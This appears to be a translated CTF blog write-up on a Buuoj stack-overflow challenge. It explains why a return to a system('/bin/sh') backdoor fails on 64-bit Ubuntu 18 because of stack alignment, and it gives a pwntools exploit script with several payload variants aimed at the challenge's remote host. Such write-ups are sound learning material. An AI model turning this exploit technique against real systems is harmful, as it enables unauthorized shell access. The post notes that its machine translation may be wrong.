Skip to main content

Issues that may occur when calling system in 64-bit ELF in Ubuntu18 (「Pwn」Ubuntu18 中64位ELF在调用system时候可能出现的问题)

· 2 min read
MuelNova
MuelNova
Pwner who wants to write codes.

Recently, when I set up Ubuntu18 and was testing it, I encountered a problem.

After researching for a long time, I finally solved it and decided to take some notes.

Challenge -- Buuoj -- RIP

Problem

This challenge is a basic stack overflow problem. There is a backdoor function that directly calls system("/bin/sh"); with no protections enabled. In theory, overwriting the return address should be sufficient.

Indeed, it worked fine during local testing, but issues arose during remote testing.

Upon further investigation, I discovered that when a 64-bit ELF program in Ubuntu18 or later calls the system function, stack balance needs to be considered in libc.

Solution

Changing the payload length or performing stack pivoting can resolve this issue.

The main idea is to change the stack address.

Here is an example exploit:

from pwn import *
context(log_level='debug', arch='amd64', os='linux')

# sh = process("./pwn1")
sh = remote("node4.buuoj.cn", 29726)

# sh.recvuntil('please input\n')

backdoor_addr = 0x0401186
# payload = b'a'*(0xf+8) + p64(backdoor_addr) # Normal idea, but due to alignment issues, it will fail
# payload = b'a'*0xf + p64(backdoor_addr) # Exploit 1, not very clear why this works:<
# payload = b'a'*(0xf+8) + p64(backdoor_addr) + p64(backdoor_addr - 1) # Exploit 2, backdoor_addr - 1 corresponds to a 'retn', can be replaced with others for stack balance
payload = b'a'*(0xf+8) + p64(backdoor_addr + 1) # Exploit 3, +1 aligns the address checked for alignment to 0x10 in call_system function
"""
It doesn't have to be +1. Aligning up to 16 times should work. If not, try stack pivoting.
"""
sh.sendline(payload)
sh.interactive()

In-depth Analysis

Here, I plan to delve into the stack at this point, which also serves as an initial exploration of gdb.

Oh no, it seems like gdb in Ubuntu18 is not working properly. I'll add more details once it's fixed:<

Reference Blogs

Issues with calling system function in some 64-bit glibc payloads

Stack balance issues involved in ret2text

Solving the program coredump issue caused by MOVAPS instruction after upgrading to gcc7.3

info

This Content is generated by ChatGPT and might be wrong / incomplete, refer to Chinese version if you find something wrong.

Loading Comments...